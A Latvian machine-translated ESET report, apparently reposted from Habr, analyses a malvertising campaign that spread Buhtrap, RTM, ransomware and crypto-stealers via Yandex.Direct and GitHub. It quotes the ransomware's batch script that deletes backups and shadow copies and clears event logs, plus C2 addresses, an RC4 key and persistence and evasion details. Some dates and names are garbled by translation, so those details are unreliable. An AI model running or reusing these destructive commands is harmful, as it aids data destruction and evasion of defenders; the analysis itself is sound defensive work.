Aizmugurējās durvis un Buhtrap šifrētājs tika izplatīti, izmantojot Yandex.Direct

Lai vērstos pret grāmatvežiem kiberuzbrukumā, varat izmantot darba dokumentus, kurus viņi meklē tiešsaistē. Tas ir aptuveni tas, ko kibergrupa ir darījusi pēdējo mēnešu laikā, izplatot zināmas aizmugures durvis. Buhtrap и RTM, kā arī šifrētāji un programmatūra kriptovalūtu zagšanai. Lielākā daļa mērķu atrodas Krievijā. Uzbrukums tika veikts, ievietojot ļaunprātīgu reklāmu vietnē Yandex.Direct. Potenciālie upuri tika novirzīti uz vietni, kurā viņiem tika lūgts lejupielādēt ļaunprātīgu failu, kas bija maskēts kā dokumenta veidne. Yandex pēc mūsu brīdinājuma noņēma ļaunprātīgo reklāmu.

Buhtrap avota kods iepriekš ir nopludināts tiešsaistē, lai ikviens varētu to izmantot. Mums nav informācijas par RTM koda pieejamību.

Šajā ziņojumā mēs jums pastāstīsim, kā uzbrucēji izplatīja ļaunprātīgu programmatūru, izmantojot Yandex.Direct, un mitināja to vietnē GitHub. Ziņa noslēgsies ar ļaunprātīgas programmatūras tehnisko analīzi.

Buhtrap un RTM atgriežas biznesā

Izplatīšanās mehānisms un upuri

Dažādajām upuriem piegādātajām kravām ir kopīgs izplatīšanas mehānisms. Visi uzbrucēju izveidotie ļaunprātīgie faili tika ievietoti divās dažādās GitHub krātuvēs.

Parasti repozitorijā bija viens lejupielādējams ļaunprātīgs fails, kas bieži mainījās. Tā kā GitHub ļauj skatīt repozitorija izmaiņu vēsturi, mēs varam redzēt, kāda ļaunprātīga programmatūra tika izplatīta noteiktā laika posmā. Lai pārliecinātu upuri lejupielādēt ļaunprātīgo failu, tika izmantota vietne blanki-shabloni24[.]ru, kas parādīta attēlā iepriekš.

Vietnes dizains un visi ļaundabīgo failu nosaukumi ir veidoti pēc vienota koncepcijas – veidlapas, veidnes, līgumi, paraugi utt. Ņemot vērā, ka Buhtrap un RTM programmatūra jau iepriekš ir izmantota uzbrukumos grāmatvežiem, mēs pieņēmām, ka stratēģija jaunajā kampaņā ir tāda pati. Jautājums ir tikai par to, kā upuris nokļuva uzbrucēju vietnē.

Infekcija

Vismaz vairākus potenciālos upurus, kas nokļuva šajā vietnē, piesaistīja ļaunprātīga reklāma. Zemāk ir URL piemērs:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

Kā redzat no saites, reklāmkarogs tika ievietots likumīgā grāmatvedības forumā bb.f2[.]kz. Ir svarīgi atzīmēt, ka baneri parādījās dažādās vietnēs, visiem bija vienāds kampaņas ID (blanki_rsya) un lielākā daļa bija saistīti ar grāmatvedības vai juridiskās palīdzības pakalpojumiem. URL parāda, ka potenciālais upuris izmantoja pieprasījumu “lejupielādēt rēķina veidlapu”, kas apstiprina mūsu hipotēzi par mērķtiecīgiem uzbrukumiem. Tālāk ir norādītas vietnes, kurās parādījās baneri, un atbilstošie meklēšanas vaicājumi.

• lejupielādēt rēķina veidlapu – bb.f2[.]kz
• līguma paraugs - Ipopen[.]ru
• iesnieguma sūdzības paraugs - 77metrov[.]ru
• līguma veidlapa - blank-dogovor-kupli-prodazhi[.]ru
• tiesas lūguma paraugs - zen.yandex[.]ru
• sūdzības paraugs - yurday[.]ru
• līguma veidlapu paraugi – Regforum[.]ru
• līguma veidlapa – assistentus[.]ru
• dzīvokļa līguma paraugs – napravah[.]com
• juridisko līgumu paraugi - avito[.]ru

Vietne blanki-shabloni24[.]ru, iespējams, ir konfigurēta, lai izturētu vienkāršu vizuālu novērtējumu. Parasti reklāma, kas norāda uz profesionāla izskata vietni ar saiti uz GitHub, nešķiet kaut kas acīmredzami slikts. Turklāt uzbrucēji krātuvē augšupielādēja ļaunprātīgus failus tikai ierobežotu laiku, iespējams, kampaņas laikā. Lielāko daļu laika GitHub repozitorijā bija tukšs zip arhīvs vai tukšs EXE fails. Tādējādi uzbrucēji varēja izplatīt reklāmu, izmantojot Yandex.Direct vietnēs, kuras, visticamāk, apmeklēja grāmatveži, kuri ieradās, atbildot uz konkrētiem meklēšanas vaicājumiem.

Tālāk apskatīsim dažādās šādā veidā sadalītās kravnesības.

Kravas slodzes analīze

Izplatības hronoloģija

Ļaunprātīgā kampaņa sākās 2018. gada oktobra beigās un ir aktīva rakstīšanas laikā. Tā kā visa krātuve bija publiski pieejama vietnē GitHub, mēs sastādījām precīzu sešu dažādu ļaunprātīgas programmatūras ģimeņu izplatīšanas laika grafiku (skatiet attēlu zemāk). Salīdzinājumam ar Git vēsturi esam pievienojuši rindiņu, kurā norādīts, kad reklāmkaroga saite tika atklāta, ko mēra ar ESET telemetriju. Kā redzat, tas labi korelē ar lietderīgās slodzes pieejamību vietnē GitHub. Neatbilstība februāra beigās ir izskaidrojama ar to, ka mums nebija daļa no izmaiņu vēstures, jo repozitorijs tika noņemts no GitHub, pirms mēs to varējām iegūt pilnībā.

1. attēls. Ļaunprātīgo programmu izplatīšanas hronoloģija.

Kodu parakstīšanas sertifikāti

Kampaņai tika izmantoti vairāki sertifikāti. Dažus no tiem parakstīja vairāk nekā viena ļaunprātīgas programmatūras saime, kas vēl vairāk norāda, ka vienai kampaņai piederēja dažādi paraugi. Neskatoties uz privātās atslēgas pieejamību, operatori sistemātiski neparakstīja bināros failus un neizmantoja atslēgu visiem paraugiem. 2019. gada februāra beigās uzbrucēji sāka veidot nederīgus parakstus, izmantojot Google piederošu sertifikātu, kuram viņiem nebija privātās atslēgas.

Visi kampaņā iesaistītie sertifikāti un to parakstītās ļaunprātīgas programmatūras saimes ir norādītas tabulā zemāk.

Mēs esam arī izmantojuši šos koda parakstīšanas sertifikātus, lai izveidotu saites ar citām ļaunprātīgas programmatūras ģimenēm. Lielākajai daļai sertifikātu mēs neatradām paraugus, kas nebūtu izplatīti caur GitHub krātuvi. Tomēr TOV “MARIYA” sertifikāts tika izmantots, lai parakstītu ļaunprātīgu programmatūru, kas pieder robottīklam Wauchos, reklāmprogrammatūra un kalnrači. Maz ticams, ka šī ļaunprogrammatūra ir saistīta ar šo kampaņu. Visticamāk, sertifikāts tika iegādāts tumšajā tīklā.

Win32/Filecoder.Buhtrap

Pirmais komponents, kas pievērsa mūsu uzmanību, bija jaunatklātais Win32/Filecoder.Buhtrap. Šis ir Delphi binārais fails, kas dažkārt tiek iepakots. Tas galvenokārt tika izplatīts 2019. gada februārī–martā. Tā darbojas kā pienākas izspiedējvīrusu programmai – tā meklē vietējos diskos un tīkla mapes un šifrē atrastos failus. Tam nav nepieciešams interneta savienojums, lai tas tiktu apdraudēts, jo tas nesazinās ar serveri, lai nosūtītu šifrēšanas atslēgas. Tā vietā izpirkuma ziņojuma beigās tiek pievienots “žetons” un tiek ieteikts izmantot e-pastu vai Bitmessage, lai sazinātos ar operatoriem.

Lai šifrētu pēc iespējas vairāk sensitīvu resursu, Filecoder.Buhtrap vada pavedienu, kas paredzēts atslēgas programmatūras izslēgšanai, kurai var būt atvērti failu apdarinātāji, kas satur vērtīgu informāciju, kas varētu traucēt šifrēšanu. Mērķa procesi galvenokārt ir datu bāzes pārvaldības sistēmas (DBVS). Turklāt Filecoder.Buhtrap dzēš žurnālfailus un dublējumkopijas, lai apgrūtinātu datu atkopšanu. Lai to izdarītu, palaidiet tālāk norādīto pakešu skriptu.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled

Filecoder.Buhtrap izmanto likumīgu tiešsaistes IP reģistrētāja pakalpojumu, kas paredzēts informācijas apkopošanai par vietnes apmeklētājiem. Tas ir paredzēts, lai izsekotu izspiedējvīrusa upurus, par ko ir atbildīga komandrinda:

mshta.exe "javascript:document.write('');"

Šifrēšanai paredzētie faili tiek atlasīti, ja tie neatbilst trim izslēgšanas sarakstiem. Pirmkārt, netiek šifrēti faili ar šādiem paplašinājumiem: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys un .sikspārnis. Otrkārt, tiek izslēgti visi faili, kuru pilnais ceļš satur direktoriju virknes no zemāk esošā saraksta.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel

Treškārt, daži failu nosaukumi arī tiek izslēgti no šifrēšanas, tostarp izpirkuma ziņojuma faila nosaukums. Saraksts ir parādīts zemāk. Acīmredzot visi šie izņēmumi ir paredzēti, lai mašīna darbotos, taču ar minimālu tehnisko apkopi.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

Failu šifrēšanas shēma

Kad ļaunprogrammatūra ir izpildīta, tā ģenerē 512 bitu RSA atslēgu pāri. Privātais eksponents (d) un modulis (n) pēc tam tiek šifrēti ar cieti kodētu 2048 bitu publisko atslēgu (publiskais eksponents un modulis), zlib pakotne un base64 kodēta. Par to atbildīgais kods ir parādīts 2. attēlā.

2. attēls. 512 bitu RSA atslēgu pāru ģenerēšanas procesa Hex-Rays dekompilācijas rezultāts.

Tālāk ir sniegts vienkārša teksta piemērs ar ģenerētu privāto atslēgu, kas ir marķieris, kas pievienots izpirkuma ziņojumam.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

Uzbrucēju publiskā atslēga ir norādīta zemāk.

e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD

Faili tiek šifrēti, izmantojot AES-128-CBC ar 256 bitu atslēgu. Katram šifrētajam failam tiek ģenerēta jauna atslēga un jauns inicializācijas vektors. Galvenā informācija tiek pievienota šifrētā faila beigās. Apskatīsim šifrētā faila formātu.
Šifrētajiem failiem ir šāda galvene:

Avota faila dati, pievienojot VEGA maģisko vērtību, tiek šifrēti līdz pirmajiem 0x5000 baitiem. Visa atšifrēšanas informācija ir pievienota failam ar šādu struktūru:

- Faila lieluma marķieris satur atzīmi, kas norāda, vai fails ir lielāks par 0x5000 baitiem
— AES atslēgas lāse = ZlibCompress (RSAEncrypt (AES atslēga + IV, ģenerētā RSA atslēgu pāra publiskā atslēga))
- RSA atslēgas lāse = ZlibCompress (RSAEncrypt (ģenerēta RSA privātā atslēga, cietā kodēta RSA publiskā atslēga))

Win32/ClipBanker

Win32/ClipBanker ir komponents, kas tika izplatīts ar pārtraukumiem no 2018. gada oktobra beigām līdz decembra sākumam. Tās uzdevums ir uzraudzīt starpliktuves saturu, tā meklē kriptovalūtu maku adreses. Pēc mērķa maka adreses noteikšanas ClipBanker to aizstāj ar adresi, kas, domājams, pieder operatoriem. Mūsu pārbaudītie paraugi nebija ne iesaiņoti, ne aptumšoti. Vienīgais mehānisms, ko izmanto uzvedības maskēšanai, ir virkņu šifrēšana. Operatora maka adreses tiek šifrētas, izmantojot RC4. Mērķa kriptovalūtas ir Bitcoin, Bitcoin cash, Dogecoin, Ethereum un Ripple.

Laikā, kad ļaunprogrammatūra izplatījās uz uzbrucēju Bitcoin makiem, neliela summa tika nosūtīta VTS, kas liek šaubīties par kampaņas panākumiem. Turklāt nav pierādījumu, kas liecinātu, ka šie darījumi vispār būtu saistīti ar ClipBanker.

Win32/RTM

32. gada marta sākumā Win2019/RTM komponents tika izplatīts vairākas dienas. RTM ir Delfos rakstīts Trojas baņķieris, kas paredzēts attālinātām banku sistēmām. 2017. gadā ESET pētnieki publicēja detalizēta analīze šīs programmas apraksts joprojām ir aktuāls. 2019. gada janvārī izlaida arī Palo Alto Networks emuāra ieraksts par RTM.

Buhtrap iekrāvējs

Kādu laiku vietnē GitHub bija pieejams lejupielādētājs, kas nebija līdzīgs iepriekšējiem Buhtrap rīkiem. Viņš pievēršas https://94.100.18[.]67/RSS.php?<some_id> lai iegūtu nākamo posmu un ielādētu to tieši atmiņā. Mēs varam atšķirt divas otrā posma koda darbības. Pirmajā vietrādī URL RSS.php tieši nodeva Buhtrap aizmugures durvis — šīs aizmugures durvis ir ļoti līdzīgas tai, kas bija pieejama pēc avota koda noplūdes.

Interesanti, ka mēs redzam vairākas kampaņas ar Buhtrap aizmugures durvīm, un tās it kā vada dažādi operatori. Šajā gadījumā galvenā atšķirība ir tā, ka aizmugures durvis tiek ielādētas tieši atmiņā un neizmanto parasto shēmu ar DLL izvietošanas procesu, par kuru mēs runājām. pirms tam. Turklāt operatori mainīja RC4 atslēgu, ko izmanto, lai šifrētu tīkla trafiku uz C&C serveri. Lielākajā daļā mūsu redzēto kampaņu operatori neuztraucās mainīt šo atslēgu.

Otra, sarežģītāka darbība bija tāda, ka RSS.php URL tika nodots citam ielādētājam. Tas ieviesa zināmu neskaidrību, piemēram, dinamiskās importēšanas tabulas pārbūvi. Bootloader mērķis ir sazināties ar C&C serveri msiofficeupd[.]com/api/F27F84EDA4D13B15/2, nosūtiet žurnālus un gaidiet atbildi. Tas apstrādā atbildi kā lāse, ielādē to atmiņā un izpilda. Lietderīgā krava, ko redzējām izpildot šo iekrāvēju, bija tā pati Buhtrap aizmugures durvis, taču var būt arī citas sastāvdaļas.

Android/Spy.Banker

Interesanti, ka GitHub repozitorijā tika atrasts arī komponents Android ierīcēm. Viņš galvenajā filiālē bija tikai vienu dienu - 1. gada 2018. novembrī. Papildus tam, ka ESET telemetrija ir publicēta vietnē GitHub, tā neatrod nekādus pierādījumus par šīs ļaunprātīgās programmatūras izplatīšanu.

Komponents tika mitināts kā Android lietojumprogrammu pakotne (APK). Tas ir ļoti apmulsis. Ļaunprātīga darbība ir paslēpta šifrētā JAR, kas atrodas APK. Tas ir šifrēts ar RC4, izmantojot šo atslēgu:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

Virkņu šifrēšanai tiek izmantota tā pati atslēga un algoritms. JAR atrodas APK_ROOT + image/files. Pirmie 4 faila baiti satur šifrētā JAR garumu, kas sākas uzreiz aiz garuma lauka.

Pēc faila atšifrēšanas mēs atklājām, ka tas bija Anubis — iepriekš dokumentēts baņķieris Android ierīcēm. Ļaunprātīgai programmatūrai ir šādas funkcijas:

• mikrofona ierakstīšana
• ekrānuzņēmumu uzņemšana
• iegūt GPS koordinātas
• taustiņu bloķētājs
• ierīces datu šifrēšana un izpirkuma maksas pieprasījums
• surogātpasta sūtīšana

Interesanti, ka baņķieris izmantoja Twitter kā rezerves saziņas kanālu, lai iegūtu citu C&C serveri. Mūsu analizētajā paraugā tika izmantots @JonesTrader konts, taču analīzes laikā tas jau bija bloķēts.

Baņķieris satur Android ierīces mērķa lietojumprogrammu sarakstu. Tas ir garāks par Sophos pētījumā iegūto sarakstu. Sarakstā ir iekļautas daudzas banku lietojumprogrammas, tiešsaistes iepirkšanās programmas, piemēram, Amazon un eBay, un kriptovalūtu pakalpojumi.

MSIL/ClipBanker.IH

Pēdējais komponents, kas tika izplatīts šīs kampaņas ietvaros, bija .NET Windows izpildāmais fails, kas parādījās 2019. gada martā. Lielākā daļa pētīto versiju bija iesaiņotas ar ConfuserEx v1.0.0. Tāpat kā ClipBanker, šis komponents izmanto starpliktuvi. Viņa mērķis ir plašs kriptovalūtu klāsts, kā arī piedāvājumi Steam. Turklāt viņš izmanto pakalpojumu IP Logger, lai nozagtu Bitcoin privāto WIF atslēgu.

Aizsardzības mehānismi
Papildus priekšrocībām, ko sniedz ConfuserEx, novēršot atkļūdošanu, izmešanu un iejaukšanos, komponents ietver iespēju noteikt pretvīrusu produktus un virtuālās mašīnas.

Lai pārbaudītu, vai tā darbojas virtuālajā mašīnā, ļaunprātīgā programmatūra izmanto iebūvēto Windows WMI komandrindu (WMIC), lai pieprasītu BIOS informāciju, proti:

wmic bios

Pēc tam programma parsē komandas izvadi un meklē atslēgvārdus: VBOX, VirtualBox, XEN, qemu, bochs, VM.

Lai noteiktu pretvīrusu produktus, ļaunprātīga programmatūra nosūta Windows pārvaldības instrumentācijas (WMI) pieprasījumu uz Windows drošības centru, izmantojot ManagementObjectSearcher API, kā parādīts zemāk. Pēc dekodēšanas no base64 zvans izskatās šādi:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

3. attēls. Pretvīrusu produktu identificēšanas process.

Turklāt ļaunprogrammatūra pārbauda, ​​vai CryptoClipWatcher, rīks, kas aizsargā pret starpliktuves uzbrukumiem un, ja tas darbojas, aptur visus pavedienus šajā procesā, tādējādi atspējojot aizsardzību.

Noturība

Ļaunprātīgās programmatūras versija, kuru mēs pētījām, kopē sevi %APPDATA%googleupdater.exe un iestata google direktorija atribūtu “slēpts”. Tad viņa maina vērtību SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell Windows reģistrā un pievieno ceļu updater.exe. Tādā veidā ļaunprogrammatūra tiks izpildīta katru reizi, kad lietotājs pieteiksies.

Ļaunprātīga uzvedība

Tāpat kā ClipBanker, ļaunprogrammatūra uzrauga starpliktuves saturu un meklē kriptovalūtas maka adreses un, kad tiek atrasta, aizstāj to ar vienu no operatora adresēm. Tālāk ir norādīts mērķa adrešu saraksts, pamatojoties uz kodā atrodamo.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

Katram adreses veidam ir atbilstoša regulārā izteiksme. STEAM_URL vērtība tiek izmantota, lai uzbruktu Steam sistēmai, kā redzams no regulārās izteiksmes, kas tiek izmantota, lai definētu buferī:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

Eksfiltrācijas kanāls

Papildus adrešu aizstāšanai buferī ļaunprogrammatūra ir vērsta uz Bitcoin, Bitcoin Core un Electrum Bitcoin maku privātajām WIF atslēgām. Programma izmanto vietni plogger.org kā izfiltrēšanas kanālu, lai iegūtu WIF privāto atslēgu. Lai to izdarītu, operatori pievieno privātās atslēgas datus User-Agent HTTP galvenē, kā parādīts tālāk.

4. attēls. IP reģistrētāja konsole ar izvades datiem.

Operatori neizmantoja vietni iplogger.org, lai izfiltrētu makus. Viņi, iespējams, izmantoja citu metodi, jo laukā ir 255 rakstzīmju ierobežojums User-Agentparādīts IP Logger tīmekļa saskarnē. Mūsu pētītajos paraugos otrs izvades serveris tika saglabāts vides mainīgajā DiscordWebHook. Pārsteidzoši, šis vides mainīgais kodā nav piešķirts nekur. Tas liecina, ka ļaunprogrammatūra joprojām ir izstrādes stadijā un mainīgais ir piešķirts operatora testa iekārtai.

Ir vēl viena pazīme, ka programma ir izstrādes stadijā. Binārajā failā ir iekļauti divi iplogger.org vietrāži URL, un abi tiek vaicāti, kad dati tiek izfiltrēti. Pieprasījumā vienam no šiem URL laukā Referer vērtības priekšā ir “DEV /”. Mēs atradām arī versiju, kas nebija iepakota, izmantojot ConfuserEx. Šī URL adresāts ir DevFeedbackUrl. Pamatojoties uz vides mainīgā nosaukumu, mēs uzskatām, ka operatori plāno izmantot likumīgo pakalpojumu Discord un tā tīmekļa pārtveršanas sistēmu, lai nozagtu kriptovalūtas makus.

Secinājums

Šī kampaņa ir piemērs likumīgu reklāmas pakalpojumu izmantošanai kiberuzbrukumos. Shēma ir vērsta pret Krievijas organizācijām, taču mēs nebūtu pārsteigti, redzot šādu uzbrukumu, izmantojot pakalpojumus, kas nav krievi. Lai izvairītos no kompromisiem, lietotājiem ir jābūt pārliecinātiem par lejupielādētās programmatūras avota reputāciju.

Pilns kompromisa un MITER ATT&CK atribūtu indikatoru saraksts ir pieejams vietnē saite.

Avots: www.habr.com